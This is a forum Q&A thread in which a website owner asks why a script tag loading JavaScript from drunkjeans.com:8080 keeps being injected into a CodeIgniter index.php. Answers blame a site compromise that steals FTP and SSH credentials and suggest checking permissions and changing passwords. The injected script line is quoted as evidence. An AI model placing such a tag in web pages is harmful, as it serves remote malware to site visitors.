another url link on my website

Question

I have a problem with my website. I don't why the index.php was being inserted with the script below. This index.php is part of codeigniter, the framework that I was currently used. Is this inserted thru accessing ftp or thru code. After I was deleted this script I noticed that on the lower left of my browser there is another url being read. I don't know how to trace this because I tried to find this url but I couldn't see it. Please help me

I encountered this scenario twice.

Any suggestion would greatly appreciated.

 <script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
 <!--11428cb2b3b67368730c012cb53eb247-->

Answer 1

Hey guys I got some info here: http://www.everythingilike.com/roundstorm-ftp-hack-solution

Basically the js hack inserts a java app which executes. This java app scans your FTP info and even any Shell/SSH login information. I suggest changing all your passwords after the clean up.

Answer 2

Your site has probably been compromised by an attacker. This sort of thing can happen if you have any folders that are world-writable (check your folder permissions). Also check for new files that weren't there before (they could be named anything and could be in any folder within the site's root folder).

For some more info on similar attacks, see:

http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html

and

http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647